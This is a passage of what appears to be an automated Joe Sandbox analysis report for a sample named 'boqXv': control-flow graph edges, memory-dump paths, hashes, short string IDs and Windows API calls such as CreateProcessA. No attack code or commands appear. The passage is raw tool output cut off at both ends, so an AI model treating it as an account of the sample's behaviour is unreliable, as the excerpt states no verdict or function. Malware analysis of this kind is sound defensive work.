484->426 484->427 484->429 484->431 484->432 484->433 484->435 484->476 485->429 502 77a07cb 485->502 500 77a07bf-77a07c6 486->500 501 77a07f3-77a07f8 486->501 488->472 489->444 497 77a0711-77a071a 489->497 490->444 496 77a06fa-77a0701 490->496 506 77a0828-77a0835 491->506 507 77a0823-77a0826 491->507 508 77a083c-77a0846 492->508 510 77a086a-77a0877 494->510 511 77a0865-77a0868 494->511 513 77a087e-77a08e8 495->513 505 77a0706 496->505 497->505 500->502 501->455 502->440 505->460 516 77a0837 506->516 507->516 525 77a0851 508->525 518 77a0879 510->518 511->518 554 77a08ea-77a08f0 513->554 555 77a0900 513->555 516->508 518->513 519->419 528 77a09c2-77a09c4 520->528 529 77a09c0 520->529 569 77a09da call 77ac8a8 521->569 570 77a09da call 77ac898 521->570 571 77a09da call 77ab2b4 521->571 572 77a09da call 77ab2a4 521->572 525->481 528->521 529->521 547 77a0ac8-77a0acd 533->547 537 77a0aab 534->537 538 77a0aad-77a0aaf 534->538 535 77a09e0-77a09e2 call 77ad63a 543 77a09e8-77a09f0 535->543 537->533 538->533 543->455 547->455 561 77a08f2 554->561 562 77a08f4-77a08f6 554->562 555->480 556->455 559 77a098f-77a0991 557->559 560 77a098d 557->560 559->556 560->556 561->555 562->555 563->455 567->408 568->408 569->535 570->535 571->535 572->535
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2818371802
                                                • Opcode ID: 8e2403b444047463a32eacaceff1d3cfc8f90567d78f3191a6983488273f2cf0
                                                • Instruction ID: 5369280987bcf289059872474cf2c577c8ef469f6465b7c30a80a2e5b7e80f4a
                                                • Opcode Fuzzy Hash: 8e2403b444047463a32eacaceff1d3cfc8f90567d78f3191a6983488273f2cf0
                                                • Instruction Fuzzy Hash: 2CF1A174F40209EFEB149B69C958B7E7AE2BBC4745F108D26E442AF394EB748C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0438 Relevance: 9.1, Strings: 7, Instructions: 398COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 574 77a0438-77a0444 575 77a0446-77a0464 574->575 576 77a0467-77a0483 574->576 575->576 737 77a0488 call 77a0b70 576->737 738 77a0488 call 77a0b80 576->738 578 77a048e 579 77a0494-77a04fe call 77a0314 578->579 589 77a0503-77a0506 579->589 590 77a0508 589->590 591 77a050f-77a0519 589->591 590->591 592 77a053b-77a054d 590->592 593 77a071c-77a0729 590->593 594 77a059d-77a05a3 590->594 595 77a0630-77a0692 590->595 596 77a07f0 590->596 597 77a0731-77a073b 590->597 598 77a0697-77a06aa 590->598 599 77a07d4-77a07e1 590->599 600 77a05ea-77a05f1 590->600 601 77a07e9-77a07ee 590->601 602 77a074e 590->602 603 77a06c2-77a06c6 590->603 604 77a0580-77a058a 590->604 605 77a0787-77a078b 590->605 606 77a0605-77a060f 590->606 607 77a051f-77a052d 591->607 608 77a06ac 591->608 668 77a0557-77a0571 call 77a2d12 592->668 593->597 621 77a05a9-77a05b5 594->621 622 77a05a5-77a05a7 594->622 595->589 625 77a07fd-77a0800 596->625 613 77a073d-77a0749 597->613 614 77a0751-77a0776 597->614 616 77a06b1 598->616 599->601 600->608 609 77a05f7-77a0600 600->609 610 77a077b-77a077e 601->610 602->614 623 77a06c8-77a06d1 603->623 624 77a06e7 603->624 617 77a058c 604->617 618 77a0596-77a059b 604->618 619 77a07ac 605->619 620 77a078d-77a0796 605->620 611 77a0618-77a061f 606->611 612 77a0611 606->612 607->608 615 77a0533-77a0539 607->615 608->616 609->589 610->605 633 77a0780 610->633 611->608 627 77a0625-77a062e 611->627 626 77a0613 612->626 630 77a06b6-77a06b9 613->630 614->610 615->589 616->630 634 77a0591 617->634 618->634 637 77a07af-77a07b1 619->637 635 77a0798-77a079b 620->635 636 77a079d-77a07a0 620->636 638 77a05b7-77a05e5 621->638 622->638 639 77a06d8-77a06db 623->639 640 77a06d3-77a06d6 623->640 642 77a06ea-77a06ec 624->642 643 77a0812-77a0816 625->643 644 77a0802 625->644 626->589 627->626 630->603 654 77a06bb 630->654 633->596 633->599 633->601 633->605 633->643 646 77a090a-77a0983 633->646 647 77a0a8a-77a0aa1 633->647 648 77a09a8-77a09ab 633->648 649 77a0ad2-77a0ad9 633->649 650 77a0903-77a0905 633->650 651 77a0854-77a0858 633->651 652 77a09f5-77a0a53 633->652 634->589 653 77a07aa 635->653 636->653 655 77a07cd-77a07d2 637->655 656 77a07b3-77a07bd 637->656 638->589 658 77a06e5 639->658 640->658 659 77a0708-77a070f 642->659 660 77a06ee-77a06f8 642->660 661 77a0818-77a0821 643->661 662 77a0839 643->662 644->643 644->646 644->647 644->648 644->649 644->650 644->651 644->652 726 77a099b-77a09a3 646->726 727 77a0985-77a098b 646->727 703 77a0ab9-77a0ac1 call 77ae462 647->703 704 77a0aa3-77a0aa9 647->704 682 77a09b4-77a09b6 648->682 650->625 664 77a085a-77a0863 651->664 665 77a087b 651->665 728 77a0a5d-77a0a6b 652->728 653->637 654->593 654->596 654->597 654->599 654->601 654->602 654->603 654->605 654->646 655->599 672 77a07cb 655->672 670 77a07bf-77a07c6 656->670 671 77a07f3-77a07f8 656->671 658->642 659->614 667 77a0711-77a071a 659->667 660->614 666 77a06fa-77a0701 660->666 676 77a0828-77a0835 661->676 677 77a0823-77a0826 661->677 678 77a083c-77a0846 662->678 680 77a086a-77a0877 664->680 681 77a0865-77a0868 664->681 683 77a087e-77a08e8 665->683 675 77a0706 666->675 667->675 689 77a0577-77a057e 668->689 670->672 671->625 672->610 675->630 686 77a0837 676->686 677->686 695 77a0851 678->695 688 77a0879 680->688 681->688 690 77a09b8-77a09be 682->690 691 77a09ce-77a09d5 682->691 724 77a08ea-77a08f0 683->724 725 77a0900 683->725 686->678 688->683 689->589 698 77a09c2-77a09c4 690->698 699 77a09c0 690->699 739 77a09da call 77ac8a8 691->739 740 77a09da call 77ac898 691->740 741 77a09da call 77ab2b4 691->741 742 77a09da call 77ab2a4 691->742 695->651 698->691 699->691 717 77a0ac8-77a0acd 703->717 707 77a0aab 704->707 708 77a0aad-77a0aaf 704->708 705 77a09e0-77a09e2 call 77ad63a 713 77a09e8-77a09f0 705->713 707->703 708->703 713->625 717->625 731 77a08f2 724->731 732 77a08f4-77a08f6 724->732 725->650 726->625 729 77a098f-77a0991 727->729 730 77a098d 727->730 733 77a0a71-77a0a85 728->733 729->726 730->726 731->725 732->725 733->625 737->578 738->578 739->705 740->705 741->705 742->705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                                                • API String ID: 0-3830373724
                                                • Opcode ID: 0a5a0d88c27c827e9e9d63e1424839969bda410a76a5ce524951ee00f8c405a5
                                                • Instruction ID: 0a4bb1bd5c8f6a1ca966f7d74817ea861bbd804b784534de9f5b5a0926d66081
                                                • Opcode Fuzzy Hash: 0a5a0d88c27c827e9e9d63e1424839969bda410a76a5ce524951ee00f8c405a5
                                                • Instruction Fuzzy Hash: 03E1B274B40209EFEB14DB69C859B7D7AE2FBC4785F108D26E542AB384EB748C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A10A8 Relevance: 8.9, Strings: 7, Instructions: 114COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 744 77a10a8-77a10c3 745 77a10ca-77a10d0 744->745 746 77a10d9-77a1136 745->746 747 77a10d2 745->747 755 77a127c-77a1286 746->755 781 77a113c 746->781 747->746 748 77a122b-77a123c 747->748 749 77a11d8-77a11e9 747->749 750 77a114e-77a115f 747->750 751 77a120e-77a1215 747->751 752 77a1192-77a11a3 747->752 753 77a1142-77a1149 747->753 748->755 764 77a123e-77a127b 748->764 749->755 766 77a11ef-77a1206 749->766 750->755 761 77a1165-77a117c 750->761 751->755 756 77a1217-77a1226 751->756 752->755 765 77a11a9-77a11c0 752->765 753->745 756->745 761->755 773 77a1182-77a118d 761->773 765->755 774 77a11c6-77a11d3 765->774 766->755 772 77a1208 766->772 772->751 773->745 774->745 781->753
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                • API String ID: 0-1901060420
                                                • Opcode ID: 5bf59f24420bf2dfe0cefbd59c48946183c8f768079f06ee77389348f2d214bb
                                                • Instruction ID: 3b9c6fad6037ba3fcdc6286dc5e7f57613da7ba2c7cbafac5701ea07c87cef9e
                                                • Opcode Fuzzy Hash: 5bf59f24420bf2dfe0cefbd59c48946183c8f768079f06ee77389348f2d214bb
                                                • Instruction Fuzzy Hash: B84180B4A04209DFEB04DFA8C99456EBBB2FF84340F64CE69C0165B3A5D731C945CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DD088 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 782 16dd088-16dd127 GetCurrentProcess 787 16dd129-16dd12f 782->787 788 16dd130-16dd164 GetCurrentThread 782->788 787->788 789 16dd16d-16dd1a1 GetCurrentProcess 788->789 790 16dd166-16dd16c 788->790 791 16dd1aa-16dd1c5 call 16dd268 789->791 792 16dd1a3-16dd1a9 789->792 790->789 796 16dd1cb-16dd1fa GetCurrentThreadId 791->796 792->791 797 16dd1fc-16dd202 796->797 798 16dd203-16dd265 796->798 797->798
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 016DD116
                                                • GetCurrentThread.KERNEL32 ref: 016DD153
                                                • GetCurrentProcess.KERNEL32 ref: 016DD190
                                                • GetCurrentThreadId.KERNEL32 ref: 016DD1E9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e68d5775bfc9c04027cff7af55900934754b1ed08bd902520cb4b1e561da32b3
                                                • Instruction ID: d2f90da3e2e82e4a52e0e97bf1c750fd2cb6c5cee615245ebdfb6f0e81d71ff7
                                                • Opcode Fuzzy Hash: e68d5775bfc9c04027cff7af55900934754b1ed08bd902520cb4b1e561da32b3
                                                • Instruction Fuzzy Hash: 905166B0D002098FEB14DFA9D948BEEBFF5EB48304F208459E519A73A0DB74A944CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DD098 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 805 16dd098-16dd127 GetCurrentProcess 809 16dd129-16dd12f 805->809 810 16dd130-16dd164 GetCurrentThread 805->810 809->810 811 16dd16d-16dd1a1 GetCurrentProcess 810->811 812 16dd166-16dd16c 810->812 813 16dd1aa-16dd1c5 call 16dd268 811->813 814 16dd1a3-16dd1a9 811->814 812->811 818 16dd1cb-16dd1fa GetCurrentThreadId 813->818 814->813 819 16dd1fc-16dd202 818->819 820 16dd203-16dd265 818->820 819->820
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 016DD116
                                                • GetCurrentThread.KERNEL32 ref: 016DD153
                                                • GetCurrentProcess.KERNEL32 ref: 016DD190
                                                • GetCurrentThreadId.KERNEL32 ref: 016DD1E9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 7f54e0d9be4a5ed88e0721182cf464dba5d7b4438357f74d1104c453a9874ba1
                                                • Instruction ID: e8f0d747b029d3213bd728e84ccf8027ef7727a28f96c6d03c88621860eafe8f
                                                • Opcode Fuzzy Hash: 7f54e0d9be4a5ed88e0721182cf464dba5d7b4438357f74d1104c453a9874ba1
                                                • Instruction Fuzzy Hash: 6F5146B0D002098FEB14DFA9D948BEEBFF5EB48314F208459E519A73A0DB74A944CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0B80 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 827 77a0b80-77a0ba0 828 77a0ba5-77a0ba8 827->828 829 77a0baa 828->829 830 77a0bb1-77a0bb7 828->830 829->830 831 77a0bfa-77a0bff 829->831 832 77a0bc8-77a0bd6 829->832 833 77a0c29-77a0c30 829->833 834 77a0c09-77a0c1b 829->834 835 77a0c5f-77a0c66 829->835 836 77a0c01 829->836 837 77a0c69-77a0c73 830->837 838 77a0bbd-77a0bc6 830->838 831->828 841 77a0bd8 832->841 842 77a0bdf-77a0be6 832->842 839 77a0c32-77a0c36 833->839 840 77a0c37-77a0c39 833->840 834->837 843 77a0c1d-77a0c24 834->843 836->834 838->828 839->840 844 77a0c3b 840->844 845 77a0c45-77a0c4f 840->845 846 77a0bdd 841->846 842->837 848 77a0bec-77a0bf8 842->848 843->828 849 77a0c40 844->849 845->837 850 77a0c51-77a0c5d 845->850 846->828 848->831 848->846 849->828 850->835 850->849
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq$8bq$8bq
                                                • API String ID: 0-2509483264
                                                • Opcode ID: 3e0542754a7669478d9c781d7b0222b58e16bdf29fb363371e5c3abb1655140b
                                                • Instruction ID: 40da4221796bf7ca11e48dd34d5ef5a1c1df10312538ff7dd2c52d3ee8f4867e
                                                • Opcode Fuzzy Hash: 3e0542754a7669478d9c781d7b0222b58e16bdf29fb363371e5c3abb1655140b
                                                • Instruction Fuzzy Hash: 6B2108B1A14315DBF7148B69D9803FAB6A5FBC2359F048F3BE0A6C6191E63CD940C211
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0758 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 988 77a0758-77a0776 992 77a077b-77a077e 988->992 993 77a0780 992->993 994 77a0787-77a078b 992->994 993->994 995 77a090a-77a0983 993->995 996 77a0a8a-77a0aa1 993->996 997 77a09a8-77a09ab 993->997 998 77a07e9-77a07ee 993->998 999 77a0ad2-77a0ad9 993->999 1000 77a0812-77a0816 993->1000 1001 77a0903-77a0905 993->1001 1002 77a07f0 993->1002 1003 77a07d4-77a07e1 993->1003 1004 77a0854-77a0858 993->1004 1005 77a09f5-77a0a53 993->1005 1006 77a07ac 994->1006 1007 77a078d-77a0796 994->1007 1068 77a099b-77a09a3 995->1068 1069 77a0985-77a098b 995->1069 1048 77a0ab9-77a0ac1 call 77ae462 996->1048 1049 77a0aa3-77a0aa9 996->1049 1024 77a09b4-77a09b6 997->1024 998->992 1008 77a0818-77a0821 1000->1008 1009 77a0839 1000->1009 1015 77a07fd-77a0800 1001->1015 1002->1015 1003->998 1010 77a085a-77a0863 1004->1010 1011 77a087b 1004->1011 1072 77a0a5d-77a0a6b 1005->1072 1014 77a07af-77a07b1 1006->1014 1012 77a0798-77a079b 1007->1012 1013 77a079d-77a07a0 1007->1013 1018 77a0828-77a0835 1008->1018 1019 77a0823-77a0826 1008->1019 1020 77a083c-77a0846 1009->1020 1022 77a086a-77a0877 1010->1022 1023 77a0865-77a0868 1010->1023 1026 77a087e-77a08e8 1011->1026 1025 77a07aa 1012->1025 1013->1025 1027 77a07cd-77a07d2 1014->1027 1028 77a07b3-77a07bd 1014->1028 1015->1000 1017 77a0802 1015->1017 1017->995 1017->996 1017->997 1017->999 1017->1000 1017->1001 1017->1004 1017->1005 1031 77a0837 1018->1031 1019->1031 1040 77a0851 1020->1040 1032 77a0879 1022->1032 1023->1032 1033 77a09b8-77a09be 1024->1033 1034 77a09ce-77a09d5 1024->1034 1025->1014 1070 77a08ea-77a08f0 1026->1070 1071 77a0900 1026->1071 1027->1003 1037 77a07cb 1027->1037 1035 77a07bf-77a07c6 1028->1035 1036 77a07f3-77a07f8 1028->1036 1031->1020 1032->1026 1043 77a09c2-77a09c4 1033->1043 1044 77a09c0 1033->1044 1080 77a09da call 77ac8a8 1034->1080 1081 77a09da call 77ac898 1034->1081 1082 77a09da call 77ab2b4 1034->1082 1083 77a09da call 77ab2a4 1034->1083 1035->1037 1036->1015 1037->992 1040->1004 1043->1034 1044->1034 1061 77a0ac8-77a0acd 1048->1061 1052 77a0aab 1049->1052 1053 77a0aad-77a0aaf 1049->1053 1050 77a09e0-77a09e2 call 77ad63a 1057 77a09e8-77a09f0 1050->1057 1052->1048 1053->1048 1057->1015 1061->1015 1068->1015 1073 77a098f-77a0991 1069->1073 1074 77a098d 1069->1074 1075 77a08f2 1070->1075 1076 77a08f4-77a08f6 1070->1076 1071->1001 1077 77a0a71-77a0a85 1072->1077 1073->1068 1074->1068 1075->1071 1076->1071 1077->1015 1080->1050 1081->1050 1082->1050 1083->1050
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: 560adfc39f75b35b5e6d887a568797d16b41405691adf2943ed68554dff8fd96
                                                • Instruction ID: c6b5b103448e1e808278caf4f335ff72a7f250572c62013825f6fb6297fd03a8
                                                • Opcode Fuzzy Hash: 560adfc39f75b35b5e6d887a568797d16b41405691adf2943ed68554dff8fd96
                                                • Instruction Fuzzy Hash: 2581B274B00208EFEB14CB64C959BBD7BA2FBC5781F108D66E542AB394EB718C40CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0809 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1085 77a0809-77a0810 1086 77a07f8 1085->1086 1087 77a0812-77a0816 1085->1087 1088 77a07fd-77a0800 1086->1088 1089 77a0818-77a0821 1087->1089 1090 77a0839 1087->1090 1088->1087 1091 77a0802 1088->1091 1092 77a0828-77a0835 1089->1092 1093 77a0823-77a0826 1089->1093 1094 77a083c-77a0846 1090->1094 1091->1087 1095 77a090a-77a0983 1091->1095 1096 77a0a8a-77a0aa1 1091->1096 1097 77a09a8-77a09ab 1091->1097 1098 77a0ad2-77a0ad9 1091->1098 1099 77a0903-77a0905 1091->1099 1100 77a0854-77a0858 1091->1100 1101 77a09f5-77a0a53 1091->1101 1102 77a0837 1092->1102 1093->1102 1104 77a0851 1094->1104 1146 77a099b-77a09a3 1095->1146 1147 77a0985-77a098b 1095->1147 1124 77a0ab9-77a0ac1 call 77ae462 1096->1124 1125 77a0aa3-77a0aa9 1096->1125 1108 77a09b4-77a09b6 1097->1108 1099->1088 1105 77a085a-77a0863 1100->1105 1106 77a087b 1100->1106 1148 77a0a5d-77a0a6b 1101->1148 1102->1094 1104->1100 1112 77a086a-77a0877 1105->1112 1113 77a0865-77a0868 1105->1113 1109 77a087e-77a08e8 1106->1109 1114 77a09b8-77a09be 1108->1114 1115 77a09ce-77a09d5 1108->1115 1144 77a08ea-77a08f0 1109->1144 1145 77a0900 1109->1145 1116 77a0879 1112->1116 1113->1116 1119 77a09c2-77a09c4 1114->1119 1120 77a09c0 1114->1120 1157 77a09da call 77ac8a8 1115->1157 1158 77a09da call 77ac898 1115->1158 1159 77a09da call 77ab2b4 1115->1159 1160 77a09da call 77ab2a4 1115->1160 1116->1109 1119->1115 1120->1115 1137 77a0ac8-77a0acd 1124->1137 1127 77a0aab 1125->1127 1128 77a0aad-77a0aaf 1125->1128 1126 77a09e0-77a09e2 call 77ad63a 1133 77a09e8-77a09f0 1126->1133 1127->1124 1128->1124 1133->1088 1137->1088 1149 77a08f2 1144->1149 1150 77a08f4-77a08f6 1144->1150 1145->1099 1146->1088 1151 77a098f-77a0991 1147->1151 1152 77a098d 1147->1152 1153 77a0a71-77a0a85 1148->1153 1149->1145 1150->1145 1151->1146 1152->1146 1153->1088 1157->1126 1158->1126 1159->1126 1160->1126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: b03a60ff06f916fe25a4ce0e452b5c1347f6e53a2bbfc73917878cf929df54b2
                                                • Instruction ID: 0fec879302f0a13885e97ba134385b55919756c3c05da6152a75c996df1be47c
                                                • Opcode Fuzzy Hash: b03a60ff06f916fe25a4ce0e452b5c1347f6e53a2bbfc73917878cf929df54b2
                                                • Instruction Fuzzy Hash: 4F61BF74B40208EFEB14CA79C959BAD7AA3FBC4741F108966E542AF394EB718C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A0D98 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1161 77a0d98-77a0da9 1162 77a0df0-77a0e06 1161->1162 1164 77a0dab-77a0dae 1162->1164 1165 77a0db0 1164->1165 1166 77a0db7-77a0dee 1164->1166 1165->1162 1165->1166 1167 77a0e4a-77a0e4f 1165->1167 1168 77a0e89-77a0e90 1165->1168 1169 77a0e0f-77a0e31 1165->1169 1170 77a0e54-77a0e84 1165->1170 1166->1164 1167->1164 1172 77a0ea8-77a0eac 1168->1172 1173 77a0e92-77a0e9a 1168->1173 1184 77a0e3c-77a0e43 1169->1184 1170->1164 1173->1172 1184->1167
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq
                                                • API String ID: 0-1276831224
                                                • Opcode ID: 474197b38f2a026b70e39134a073d38ad5bdeceac2030cb85b8579fcb16fb605
                                                • Instruction ID: 85acbae20162710943f5e7736e1586ca13ef8b8b1840342da8120deb97f7210f
                                                • Opcode Fuzzy Hash: 474197b38f2a026b70e39134a073d38ad5bdeceac2030cb85b8579fcb16fb605
                                                • Instruction Fuzzy Hash: 262124B261821AFBF7206A29950077A77A5E7C6392F408F36E48597280E738DC51DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6DD8 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1185 77a6dd8-77a6df6 1186 77a6df8 1185->1186 1187 77a6dfd-77a6e02 1185->1187 1186->1187 1199 77a6e05 call 77a6ed0 1187->1199 1200 77a6e05 call 77a6ec1 1187->1200 1188 77a6e0b 1189 77a6e12-77a6e2e 1188->1189 1190 77a6e30 1189->1190 1191 77a6e37-77a6e38 1189->1191 1190->1188 1190->1191 1192 77a6e3a-77a6e4e 1190->1192 1193 77a6e7e-77a6ea0 1190->1193 1194 77a6ea5-77a6ea9 1190->1194 1191->1194 1196 77a6e50-77a6e5f 1192->1196 1197 77a6e61-77a6e68 1192->1197 1193->1189 1198 77a6e6f-77a6e7c 1196->1198 1197->1198 1198->1189 1199->1188 1200->1188
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 26141644a78386ab87d75c531668281a16a6ff70b7974fab4dc24640dd0b15b8
                                                • Instruction ID: 5f215df683b5ef6d499f90b84f152ebf63f5abb3675282733d262654a7e77138
                                                • Opcode Fuzzy Hash: 26141644a78386ab87d75c531668281a16a6ff70b7974fab4dc24640dd0b15b8
                                                • Instruction Fuzzy Hash: F22139B0E15209EFDB44CFAAC940AAEFBF1FF99340F14C5AA9508E7214E7309A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B7AED Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 032B7D2E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 08e24f98effa605fa3d953c8b908ddd185e65fc806cfa59f5ea4c5a326083fae
                                                • Instruction ID: 31f25afdfa8442e93d66258c9c94f9bc233b06728588774faeb7a8518df19656
                                                • Opcode Fuzzy Hash: 08e24f98effa605fa3d953c8b908ddd185e65fc806cfa59f5ea4c5a326083fae
                                                • Instruction Fuzzy Hash: 4FA16B71D1021ADFDB10CF68C841BEDBBB2BF84354F1885AAE849A7280DB7499C5CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B7AF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 032B7D2E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7440536e3f2a862667bd8fa6fa0b245b9d104325a0fdaad3e1916bf24dc9d60f
                                                • Instruction ID: 65c1fc4e5d6204f872db8c5cccd848b69eb28d81efb1e6606c4789049f2200e5
                                                • Opcode Fuzzy Hash: 7440536e3f2a862667bd8fa6fa0b245b9d104325a0fdaad3e1916bf24dc9d60f
                                                • Instruction Fuzzy Hash: 37916B71D1021ADFDB10CF68C841BEDBBB2BF88354F1885A9E849A7280DB7499C5CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DAD00 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016DAF56
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a5b48edcc7f7b14720e97cd43824c7cdbf23e5e0113d25fe2b4146da8f939d04
                                                • Instruction ID: 34e3e579515f3af045f49223e4c188122c7167f9f1173d81eb5d987e37f98d15
                                                • Opcode Fuzzy Hash: a5b48edcc7f7b14720e97cd43824c7cdbf23e5e0113d25fe2b4146da8f939d04
                                                • Instruction Fuzzy Hash: CA7111B0A00B058FDB24DF6AC84475ABBF6BF88300F00892DD48A97B50DB75E949CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016D44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                                Memory Dump Source
